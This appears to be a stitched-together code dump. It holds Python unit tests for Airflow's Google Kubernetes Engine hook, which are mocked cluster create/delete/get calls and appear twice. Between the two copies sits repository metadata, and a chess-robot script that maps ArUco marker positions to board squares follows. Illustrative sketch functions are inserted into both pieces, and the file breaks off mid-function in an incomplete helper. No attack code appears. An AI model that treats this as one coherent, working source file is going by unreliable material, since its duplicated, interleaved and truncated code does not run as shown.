class TestGKEHookClient(unittest.TestCase):
def setUp(self):
self.gke_hook = GKEHook(location=GKE_ZONE)
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.client_info",
new_callable=mock.PropertyMock
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook._get_credentials")
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.container_v1.ClusterManagerClient")
def test_gke_cluster_client_creation(self, mock_client, mock_get_creds, mock_client_info):
result = self.gke_hook.get_conn()
mock_client.assert_called_once_with(
credentials=mock_get_creds.return_value,
client_info=mock_client_info.return_value
)
self.assertEqual(mock_client.return_value, result)
self.assertEqual(self.gke_hook._client, result)
class TestGKEHookDelete(unittest.TestCase):
def setUp(self):
self.gke_hook = GKEHook(location=GKE_ZONE)
self.gke_hook._client = mock.Mock()
@mock.patch(
'airflow.providers.google.cloud.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_delete_cluster(self, wait_mock, convert_mock, mock_project_id):
retry_mock, timeout_mock = mock.Mock(), mock.Mock()
client_delete = self.gke_hook._client.delete_cluster = mock.Mock()
self.gke_hook.delete_cluster(name=CLUSTER_NAME, project_id=TEST_GCP_PROJECT_ID,
retry=retry_mock,
timeout=timeout_mock)
client_delete.assert_called_once_with(project_id=TEST_GCP_PROJECT_ID,
zone=GKE_ZONE,
cluster_id=CLUSTER_NAME,
retry=retry_mock,
timeout=timeout_mock)
wait_mock.assert_called_once_with(client_delete.return_value)
convert_mock.assert_not_called()
@mock.patch(
'airflow.providers.google.cloud.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.log")
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_delete_cluster_not_found(self, wait_mock, convert_mock, log_mock, mock_project_id):
from google.api_core.exceptions import NotFound
# To force an error
message = 'Not Found'
self.gke_hook._client.delete_cluster.side_effect = NotFound(message=message)
self.gke_hook.delete_cluster(name='not-existing', project_id=TEST_GCP_PROJECT_ID)
wait_mock.assert_not_called()
convert_mock.assert_not_called()
log_mock.info.assert_any_call("Assuming Success: %s", message)
@mock.patch(
'airflow.providers.google.cloud.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_delete_cluster_error(self, wait_mock, convert_mock, mock_project_id):
# To force an error
self.gke_hook._client.delete_cluster.side_effect = AirflowException('400')
with self.assertRaises(AirflowException):
self.gke_hook.delete_cluster(name='a-cluster')
wait_mock.assert_not_called()
convert_mock.assert_not_called()
class TestGKEHookCreate(unittest.TestCase):
def setUp(self):
self.gke_hook = GKEHook(location=GKE_ZONE)
self.gke_hook._client = mock.Mock()
@mock.patch(
'airflow.providers.google.cloud.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_create_cluster_proto(self, wait_mock, convert_mock, mock_project_id):
mock_cluster_proto = Cluster()
mock_cluster_proto.name = CLUSTER_NAME
retry_mock, timeout_mock = mock.Mock(), mock.Mock()
client_create = self.gke_hook._client.create_cluster = mock.Mock()
self.gke_hook.create_cluster(cluster=mock_cluster_proto,
project_id=TEST_GCP_PROJECT_ID,
retry=retry_mock,
timeout=timeout_mock)
client_create.assert_called_once_with(project_id=TEST_GCP_PROJECT_ID,
zone=GKE_ZONE,
cluster=mock_cluster_proto,
retry=retry_mock, timeout=timeout_mock)
wait_mock.assert_called_once_with(client_create.return_value)
convert_mock.assert_not_called()
@mock.patch(
'airflow.providers.google.cloud.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_create_cluster_dict(self, wait_mock, convert_mock, mock_project_id):
mock_cluster_dict = {'name': CLUSTER_NAME}
retry_mock, timeout_mock = mock.Mock(), mock.Mock()
client_create = self.gke_hook._client.create_cluster = mock.Mock()
proto_mock = convert_mock.return_value = mock.Mock()
self.gke_hook.create_cluster(cluster=mock_cluster_dict,
project_id=TEST_GCP_PROJECT_ID,
retry=retry_mock,
timeout=timeout_mock)
client_create.assert_called_once_with(project_id=TEST_GCP_PROJECT_ID,
zone=GKE_ZONE,
cluster=proto_mock,
retry=retry_mock, timeout=timeout_mock)
wait_mock.assert_called_once_with(client_create.return_value)
convert_mock.assert_called_once_with(
{'name': 'test-cluster'},
Cluster()
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_create_cluster_error(self, wait_mock, convert_mock):
# to force an error
mock_cluster_proto = None
with self.assertRaises(AirflowException):
self.gke_hook.create_cluster(mock_cluster_proto)
wait_mock.assert_not_called()
convert_mock.assert_not_called()
@mock.patch(
'airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook._get_credentials_and_project_id',
return_value=(mock.MagicMock(), TEST_GCP_PROJECT_ID)
)
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.log")
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_create_cluster_already_exists(self, wait_mock, convert_mock, log_mock, mock_get_credentials):
from google.api_core.exceptions import AlreadyExists
# To force an error
message = 'Already Exists'
self.gke_hook._client.create_cluster.side_effect = AlreadyExists(message=message)
self.gke_hook.create_cluster(cluster={}, project_id=TEST_GCP_PROJECT_ID)
wait_mock.assert_not_called()
self.assertEqual(convert_mock.call_count, 1)
log_mock.info.assert_any_call("Assuming Success: %s", message)
class TestGKEHookGet(unittest.TestCase):
def setUp(self):
self.gke_hook = GKEHook(location=GKE_ZONE)
self.gke_hook._client = mock.Mock()
def test_get_cluster(self):
retry_mock, timeout_mock = mock.Mock(), mock.Mock()
client_get = self.gke_hook._client.get_cluster = mock.Mock()
self.gke_hook.get_cluster(name=CLUSTER_NAME,
project_id=TEST_GCP_PROJECT_ID,
retry=retry_mock,
timeout=timeout_mock)
client_get.assert_called_once_with(project_id=TEST_GCP_PROJECT_ID,
zone=GKE_ZONE,
cluster_id=CLUSTER_NAME,
retry=retry_mock, timeout=timeout_mock)
class TestGKEHook(unittest.TestCase):
def setUp(self):
self.gke_hook = GKEHook(location=GKE_ZONE)
self.gke_hook._client = mock.Mock()
@mock.patch('airflow.providers.google.cloud.hooks.kubernetes_engine.container_v1.'
'ClusterManagerClient')
@mock.patch('airflow.providers.google.cloud.hooks.base.ClientInfo')
@mock.patch('airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook._get_credentials')
def test_get_client(self, mock_get_credentials, mock_client_info, mock_client):
self.gke_hook._client = None
self.gke_hook.get_conn()
assert mock_get_credentials.called
mock_client.assert_called_once_with(
credentials=mock_get_credentials.return_value,
client_info=mock_client_info.return_value)
def test_get_operation(self):
self.gke_hook._client.get_operation = mock.Mock()
self.gke_hook.get_operation('TEST_OP', project_id=TEST_GCP_PROJECT_ID)
self.gke_hook._client.get_operation.assert_called_once_with(
project_id=TEST_GCP_PROJECT_ID, zone=GKE_ZONE, operation_id='TEST_OP')
def test_append_label(self):
key = 'test-key'
val = 'test-val'
mock_proto = mock.Mock()
self.gke_hook._append_label(mock_proto, key, val)
mock_proto.resource_labels.update.assert_called_once_with({key: val})
def test_append_label_replace(self):
key = 'test-key'
val = 'test.val+this'
mock_proto = mock.Mock()
self.gke_hook._append_label(mock_proto, key, val)
mock_proto.resource_labels.update.assert_called_once_with({key: 'test-val-this'})
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.time.sleep")
def test_wait_for_response_done(self, time_mock):
from google.cloud.container_v1.gapic.enums import Operation
mock_op = mock.Mock()
mock_op.status = Operation.Status.DONE
self.gke_hook.wait_for_operation(mock_op)
self.assertEqual(time_mock.call_count, 1)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.time.sleep")
def test_wait_for_response_exception(self, time_mock):
from google.cloud.container_v1.gapic.enums import Operation
from google.cloud.exceptions import GoogleCloudError
mock_op = mock.Mock()
mock_op.status = Operation.Status.ABORTING
with self.assertRaises(GoogleCloudError):
self.gke_hook.wait_for_operation(mock_op)
self.assertEqual(time_mock.call_count, 1)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.get_operation")
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.time.sleep")
def test_wait_for_response_running(self, time_mock, operation_mock):
from google.cloud.container_v1.gapic.enums import Operation
running_op, done_op, pending_op = mock.Mock(), mock.Mock(), mock.Mock()
running_op.status = Operation.Status.RUNNING
done_op.status = Operation.Status.DONE
pending_op.status = Operation.Status.PENDING
# Status goes from Running -> Pending -> Done
operation_mock.side_effect = [pending_op, done_op]
self.gke_hook.wait_for_operation(running_op, project_id=TEST_GCP_PROJECT_ID)
self.assertEqual(time_mock.call_count, 3)
operation_mock.assert_any_call(running_op.name, project_id=TEST_GCP_PROJECT_ID)
operation_mock.assert_any_call(pending_op.name, project_id=TEST_GCP_PROJECT_ID)
self.assertEqual(operation_mock.call_count, 2)
| 44.359621
| 107
| 0.685535
|
import unittest
import mock
from google.cloud.container_v1.types import Cluster
from mock import PropertyMock
from airflow import AirflowException
from airflow.providers.google.cloud.hooks.kubernetes_engine import GKEHook
TASK_ID = 'test-gke-cluster-operator'
CLUSTER_NAME = 'test-cluster'
TEST_GCP_PROJECT_ID = 'test-project'
GKE_ZONE = 'test-zone'
class TestGKEHookClient(unittest.TestCase):
def setUp(self):
self.gke_hook = GKEHook(location=GKE_ZONE)
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.client_info",
new_callable=mock.PropertyMock
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook._get_credentials")
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.container_v1.ClusterManagerClient")
def test_gke_cluster_client_creation(self, mock_client, mock_get_creds, mock_client_info):
result = self.gke_hook.get_conn()
mock_client.assert_called_once_with(
credentials=mock_get_creds.return_value,
client_info=mock_client_info.return_value
)
self.assertEqual(mock_client.return_value, result)
self.assertEqual(self.gke_hook._client, result)
class TestGKEHookDelete(unittest.TestCase):
def setUp(self):
self.gke_hook = GKEHook(location=GKE_ZONE)
self.gke_hook._client = mock.Mock()
@mock.patch(
'airflow.providers.google.cloud.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_delete_cluster(self, wait_mock, convert_mock, mock_project_id):
retry_mock, timeout_mock = mock.Mock(), mock.Mock()
client_delete = self.gke_hook._client.delete_cluster = mock.Mock()
self.gke_hook.delete_cluster(name=CLUSTER_NAME, project_id=TEST_GCP_PROJECT_ID,
retry=retry_mock,
timeout=timeout_mock)
client_delete.assert_called_once_with(project_id=TEST_GCP_PROJECT_ID,
zone=GKE_ZONE,
cluster_id=CLUSTER_NAME,
retry=retry_mock,
timeout=timeout_mock)
wait_mock.assert_called_once_with(client_delete.return_value)
convert_mock.assert_not_called()
@mock.patch(
'airflow.providers.google.cloud.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.log")
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_delete_cluster_not_found(self, wait_mock, convert_mock, log_mock, mock_project_id):
from google.api_core.exceptions import NotFound
message = 'Not Found'
self.gke_hook._client.delete_cluster.side_effect = NotFound(message=message)
self.gke_hook.delete_cluster(name='not-existing', project_id=TEST_GCP_PROJECT_ID)
wait_mock.assert_not_called()
convert_mock.assert_not_called()
log_mock.info.assert_any_call("Assuming Success: %s", message)
@mock.patch(
'airflow.providers.google.cloud.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_delete_cluster_error(self, wait_mock, convert_mock, mock_project_id):
self.gke_hook._client.delete_cluster.side_effect = AirflowException('400')
with self.assertRaises(AirflowException):
self.gke_hook.delete_cluster(name='a-cluster')
wait_mock.assert_not_called()
convert_mock.assert_not_called()
class TestGKEHookCreate(unittest.TestCase):
def setUp(self):
self.gke_hook = GKEHook(location=GKE_ZONE)
self.gke_hook._client = mock.Mock()
@mock.patch(
'airflow.providers.google.cloud.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_create_cluster_proto(self, wait_mock, convert_mock, mock_project_id):
mock_cluster_proto = Cluster()
mock_cluster_proto.name = CLUSTER_NAME
retry_mock, timeout_mock = mock.Mock(), mock.Mock()
client_create = self.gke_hook._client.create_cluster = mock.Mock()
self.gke_hook.create_cluster(cluster=mock_cluster_proto,
project_id=TEST_GCP_PROJECT_ID,
retry=retry_mock,
timeout=timeout_mock)
client_create.assert_called_once_with(project_id=TEST_GCP_PROJECT_ID,
zone=GKE_ZONE,
cluster=mock_cluster_proto,
retry=retry_mock, timeout=timeout_mock)
wait_mock.assert_called_once_with(client_create.return_value)
convert_mock.assert_not_called()
@mock.patch(
'airflow.providers.google.cloud.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_create_cluster_dict(self, wait_mock, convert_mock, mock_project_id):
mock_cluster_dict = {'name': CLUSTER_NAME}
retry_mock, timeout_mock = mock.Mock(), mock.Mock()
client_create = self.gke_hook._client.create_cluster = mock.Mock()
proto_mock = convert_mock.return_value = mock.Mock()
self.gke_hook.create_cluster(cluster=mock_cluster_dict,
project_id=TEST_GCP_PROJECT_ID,
retry=retry_mock,
timeout=timeout_mock)
client_create.assert_called_once_with(project_id=TEST_GCP_PROJECT_ID,
zone=GKE_ZONE,
cluster=proto_mock,
retry=retry_mock, timeout=timeout_mock)
wait_mock.assert_called_once_with(client_create.return_value)
convert_mock.assert_called_once_with(
{'name': 'test-cluster'},
Cluster()
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_create_cluster_error(self, wait_mock, convert_mock):
mock_cluster_proto = None
with self.assertRaises(AirflowException):
self.gke_hook.create_cluster(mock_cluster_proto)
wait_mock.assert_not_called()
convert_mock.assert_not_called()
@mock.patch(
'airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook._get_credentials_and_project_id',
return_value=(mock.MagicMock(), TEST_GCP_PROJECT_ID)
)
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.log")
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_create_cluster_already_exists(self, wait_mock, convert_mock, log_mock, mock_get_credentials):
from google.api_core.exceptions import AlreadyExists
message = 'Already Exists'
self.gke_hook._client.create_cluster.side_effect = AlreadyExists(message=message)
self.gke_hook.create_cluster(cluster={}, project_id=TEST_GCP_PROJECT_ID)
wait_mock.assert_not_called()
self.assertEqual(convert_mock.call_count, 1)
log_mock.info.assert_any_call("Assuming Success: %s", message)
class TestGKEHookGet(unittest.TestCase):
def setUp(self):
self.gke_hook = GKEHook(location=GKE_ZONE)
self.gke_hook._client = mock.Mock()
def test_get_cluster(self):
retry_mock, timeout_mock = mock.Mock(), mock.Mock()
client_get = self.gke_hook._client.get_cluster = mock.Mock()
self.gke_hook.get_cluster(name=CLUSTER_NAME,
project_id=TEST_GCP_PROJECT_ID,
retry=retry_mock,
timeout=timeout_mock)
client_get.assert_called_once_with(project_id=TEST_GCP_PROJECT_ID,
zone=GKE_ZONE,
cluster_id=CLUSTER_NAME,
retry=retry_mock, timeout=timeout_mock)
class TestGKEHook(unittest.TestCase):
def setUp(self):
self.gke_hook = GKEHook(location=GKE_ZONE)
self.gke_hook._client = mock.Mock()
@mock.patch('airflow.providers.google.cloud.hooks.kubernetes_engine.container_v1.'
'ClusterManagerClient')
@mock.patch('airflow.providers.google.cloud.hooks.base.ClientInfo')
@mock.patch('airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook._get_credentials')
def test_get_client(self, mock_get_credentials, mock_client_info, mock_client):
self.gke_hook._client = None
self.gke_hook.get_conn()
assert mock_get_credentials.called
mock_client.assert_called_once_with(
credentials=mock_get_credentials.return_value,
client_info=mock_client_info.return_value)
def test_get_operation(self):
self.gke_hook._client.get_operation = mock.Mock()
self.gke_hook.get_operation('TEST_OP', project_id=TEST_GCP_PROJECT_ID)
self.gke_hook._client.get_operation.assert_called_once_with(
project_id=TEST_GCP_PROJECT_ID, zone=GKE_ZONE, operation_id='TEST_OP')
def test_append_label(self):
key = 'test-key'
val = 'test-val'
mock_proto = mock.Mock()
self.gke_hook._append_label(mock_proto, key, val)
mock_proto.resource_labels.update.assert_called_once_with({key: val})
def test_append_label_replace(self):
key = 'test-key'
val = 'test.val+this'
mock_proto = mock.Mock()
self.gke_hook._append_label(mock_proto, key, val)
mock_proto.resource_labels.update.assert_called_once_with({key: 'test-val-this'})
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.time.sleep")
def test_wait_for_response_done(self, time_mock):
from google.cloud.container_v1.gapic.enums import Operation
mock_op = mock.Mock()
mock_op.status = Operation.Status.DONE
self.gke_hook.wait_for_operation(mock_op)
self.assertEqual(time_mock.call_count, 1)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.time.sleep")
def test_wait_for_response_exception(self, time_mock):
from google.cloud.container_v1.gapic.enums import Operation
from google.cloud.exceptions import GoogleCloudError
mock_op = mock.Mock()
mock_op.status = Operation.Status.ABORTING
with self.assertRaises(GoogleCloudError):
self.gke_hook.wait_for_operation(mock_op)
self.assertEqual(time_mock.call_count, 1)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.get_operation")
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.time.sleep")
def test_wait_for_response_running(self, time_mock, operation_mock):
from google.cloud.container_v1.gapic.enums import Operation
running_op, done_op, pending_op = mock.Mock(), mock.Mock(), mock.Mock()
running_op.status = Operation.Status.RUNNING
done_op.status = Operation.Status.DONE
pending_op.status = Operation.Status.PENDING
operation_mock.side_effect = [pending_op, done_op]
self.gke_hook.wait_for_operation(running_op, project_id=TEST_GCP_PROJECT_ID)
self.assertEqual(time_mock.call_count, 3)
operation_mock.assert_any_call(running_op.name, project_id=TEST_GCP_PROJECT_ID)
operation_mock.assert_any_call(pending_op.name, project_id=TEST_GCP_PROJECT_ID)
self.assertEqual(operation_mock.call_count, 2)
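# --- Illustrative sketch, not the actual Airflow implementation ---
# The three wait_for_response tests above pin down the polling contract of
# GKEHook.wait_for_operation: sleep once per iteration, refresh RUNNING/PENDING operations
# through get_operation(name), return once the status is DONE, and raise for any other
# (failed) status. Under those assumptions the loop looks roughly like this; the poll
# interval and helper name are made up for illustration:
def _wait_for_operation_sketch(hook, operation, project_id=None, poll_interval=10):
    import time
    from google.cloud.container_v1.gapic.enums import Operation
    from google.cloud.exceptions import GoogleCloudError
    while True:
        time.sleep(poll_interval)  # exactly one sleep per loop, matching the call counts asserted above
        if operation.status == Operation.Status.DONE:
            return operation
        if operation.status in (Operation.Status.RUNNING, Operation.Status.PENDING):
            operation = hook.get_operation(operation.name, project_id=project_id)
        else:
            raise GoogleCloudError("Operation has failed with status: %s" % operation.status)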
| true
| true
|
1c3e850e69120700b53c04cd15ff2bb0f49eba20
| 9,662
|
py
|
Python
|
templateMatching.py
|
AndrewMDelgado/UTA_ChessBot
|
e57218526102a95db8e9b4892c1c1b63b1322c98
|
[
"MIT"
] | null | null | null |
templateMatching.py
|
AndrewMDelgado/UTA_ChessBot
|
e57218526102a95db8e9b4892c1c1b63b1322c98
|
[
"MIT"
] | null | null | null |
templateMatching.py
|
AndrewMDelgado/UTA_ChessBot
|
e57218526102a95db8e9b4892c1c1b63b1322c98
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 7 14:48:33 2018
@author: lenangungu
"""
import numpy as np
import time
from aruco_detect import detectCode
from aruco_detect import detectCode2
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import skimage.feature as sk
class Match:
def __init__(self):
self.board = self.createBoard()
def position(self, corners):
print (corners)
x = min(corners[0][0],corners[1][0],corners[2][0],corners[3][0])
y = min(corners[0][1],corners[2][1],corners[1][1],corners[3][1])
center = [int(x), int(y)]
        # scan the 8x8 grid built by createBoard() to find which square this point falls in
for i in range (0,8):
row = self.board[i] # e.g A
for j in range (0,8):
square1 = row[j] # e.g A1
                # compare the marker's reference point against this square's top-left/bottom-right bounds (see marker_center_sketch below for using the true centre)
print(center[0],square1[0][0], square1[1][0])
print(center[1], square1[0][1], square1[1][1])
if ((center[0] > square1[0][0]) and (center[0] < square1[1][0])):
if((center[1] > square1[0][1]) and (center[1] < square1[1][1])):
currentSquare = square1[2]
return currentSquare
def createBoard(self):
colMax = 41 #change depending on picture
rowMax = 338
#print("(",rowMax,"," ,colMax,")")
topL = [colMax,rowMax]
botR = [121,415]
topLi = topL
botRi = botR
board = []
        # WILL TURN THIS PROCESS OF MAKING THE ROWS INTO A FUNCTION LATER
#Creating row A
#A = [[(topL,botR,'A1')]]
A = [[topL,botR,'A1']]
for i in range (2,9):
#xtopL = [i*topL[0],topL[1]]
xtopL = [botRi[0],topLi[1]]
#xbotR = [(i+1)*topL[0],botR[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
A.append((xtopL,xbotR,('A'+ str(i))))
topLi = xtopL
botRi = xbotR
#Creating row B
topL2 = [topL[0],topL[1] + (botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + (botR[1]-topL[1])]
topLi = topL2
botRi = botR2
board.append(A)
B = [[topL2,botR2,'B1']]
for i in range (2,9):
#xtopL = [i*topL2[0],topL2[1]]
#xbotR = [(i+1)*topL2[0],botR2[1]]
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
B.append((xtopL,xbotR,('B'+ str(i))))
board.append(B)
#Creating row C
topL2 = [topL[0],topL[1] + 2*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 2*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
C = [[topL2,botR2,'C1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
C.append((xtopL,xbotR,('C'+ str(i))))
board.append(C)
#Creating row D
topL2 = [topL[0],topL[1] + 3*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 3*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
D = [[topL2,botR2,'D1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
D.append((xtopL,xbotR,('D'+ str(i))))
board.append(D)
#Creating row E
topL2 = [topL[0],topL[1] + 4*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 4*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
E = [[topL2,botR2,'E1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
E.append((xtopL,xbotR,('E'+ str(i))))
board.append(E)
#Creating row F
topL2 = [topL[0],topL[1] + 5*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 5*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
F = [[topL2,botR2,'F1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
F.append((xtopL,xbotR,('F'+ str(i))))
board.append(F)
#Creating row G
topL2 = [topL[0],topL[1] + 6*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 6*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
G = [[topL2,botR2,'G1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
G.append((xtopL,xbotR,('G'+ str(i))))
board.append(G)
#Creating row H
topL2 = [topL[0],topL[1] + 7*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 7*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
H = [[topL2,botR2,'H1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
H.append((xtopL,xbotR,('H'+ str(i))))
board.append(H)
return board
'''
#This is to make sure the board is stored correctly
for i in range (H[7][0][1], H[7][1][1]):
for u in range (H[7][0][0],(H[7][1][0])):
img_copy[i][u] = 0
plt.figure(3)
fullImgGray = rgb2gray(img_copy)
plt.imshow(fullImgGray, cmap = plt.get_cmap('gray'))
'''
'''
#TO OPTIMIZE, USE CENTER OF ARUCO AND SQUARE ON BOARD
#Algorithm to see what square aruco code falls in
#Aruco returns four corners of the ID
'''
def genDiffs(self): #function that runs templateMatching
#call aruco detect to get ids and corresponding corners
currentSquare = ''
square_ids = []
#Have aruco detect make a 2D array of id,corners
#Call aruco_detect and return ids with corresponding coordinates and save as previous state
changes = []
ids1, previousState = detectCode()
#after a user move, call aruco_detect and save as current state
ids2, currentState = detectCode2()
idsPrev = ids1
idsCurr = ids2
ids1 = ids1.astype(int)
ids1 = ids1.ravel()
ids1.sort()
ids2 = ids2.astype(int)
ids2 = ids2.ravel()
ids2.sort()
#print("ids1: ",ids1)
        #print("ids2: ",ids2)
#Run algorithm to detect move
if (len(previousState) == len(currentState)):
#find which id changed coordinates
for i in range(0, len(previousState)):
                # a slight physical nudge of a piece also changes its coordinates, so more than one detected change may need a closer look
                if (previousState[i][0] != currentState[i][0]).any(): #Assuming the ids are ordered, if not then order them using a function
pos1 = self.position(previousState[i][0])#call function that computes squares - takes corners of ID
pos2 = self.position(currentState[i][0])
changes.append((idsPrev[i],pos1,pos2))
else:
pass
#Use changes array to classify the new position of pieces (create a classify function that returns ids and squares they are in)
else:
#print(len(previousState),len(currentState))
for i in range (0,len(ids1)):
currentID = ids1[i]
j = 0
f = 0
for j in range (0,len(ids2)):
if currentID == ids2[j]:
f = 1
#still check if coordinates changed
                        if (previousState[np.where(idsPrev == currentID)[0]][0] != currentState[np.where(idsCurr == currentID)[0]][0]).any():
#compute square change
pos1 = self.position(previousState[np.where(idsPrev == (currentID))[0]][0])#call function that computes squares - takes corners of ID
pos2 = self.position(currentState[np.where(idsCurr == (currentID))[0]][0])
changes.append((currentID,pos1,pos2))
#print(current,ids2[j])
else:
j += 1
if f == 0:
#get coordinates from corners of previous state
#classify square and have (id,from,null) - meaning piece was removed
print(currentID)
pos1 = self.position(previousState[np.where(idsPrev == (currentID))[0]][0])
pos2 = '_'
changes.append((currentID,pos1,pos2))
print(changes)
#print to a file
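# --- Illustrative sketch, not part of the original script ---
# createBoard() above writes out rows A-H by hand with the same arithmetic repeated eight
# times, and the "TO OPTIMIZE" note suggests using the true centre of the ArUco marker
# rather than its min-corner. Both ideas condense to the helpers below; the origin and
# square size come from the same hard-coded calibration values (topL/botR) used above and
# are assumptions tied to that particular camera picture.
def build_board_sketch(top_left=(41, 338), bottom_right=(121, 415)):
    width = bottom_right[0] - top_left[0]   # one square is 80 px wide with these values
    height = bottom_right[1] - top_left[1]  # and 77 px tall
    board = []
    for r, row_name in enumerate("ABCDEFGH"):
        row = []
        for c in range(8):
            tl = [top_left[0] + c * width, top_left[1] + r * height]
            br = [tl[0] + width, tl[1] + height]
            row.append((tl, br, row_name + str(c + 1)))
        board.append(row)
    return board

def marker_center_sketch(corners):
    # mean of the four ArUco corner points, instead of the bounding-box corner used in position()
    xs = [p[0] for p in corners]
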